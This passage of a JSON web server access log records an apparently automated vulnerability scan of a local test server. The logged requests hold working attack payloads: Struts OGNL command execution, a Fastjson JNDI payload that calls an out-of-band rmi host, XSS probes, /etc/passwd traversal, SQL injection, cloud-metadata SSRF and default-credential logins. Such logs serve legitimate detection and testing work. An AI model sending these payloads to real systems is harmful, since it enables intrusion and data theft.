+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db_config.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /profile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uploads/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/297MFffkYWjAuMtekdT8qapP5Wy/)%3B%3C%2Fscript%3E%3C HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/user/picker?query= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SAPIrExtHelp/random/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.Dockerfile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"{\x22query\x22:\x22query {\x5Cn __schema {\x5Cn directive\x5Cn }\x5Cn}\x22,\x22variables\x22:null}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/cam_portal.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWeb/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22phar://../storage/logs/laravel.log/test.txt\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel-filemanager?type=Files HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /404.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/profile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.redmine-cli HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"user=root&password=calvin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /data/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /desktop/container/landing.jsp?locale=en_US HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ReportServer/Pages/ReportViewer.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data/pbootcms.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /versa/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/config.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWeb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /alps/profile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/initializers/secret_token.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/metadata/v1.json HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.207","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22Lcom.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://c9v8gc8smpv8b0ng0t00qw6zy6acfrqkx.oast.online/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/openstack/latest HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.512","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fcgi-bin/wgsetcgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/Grimag/go.php?https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:02 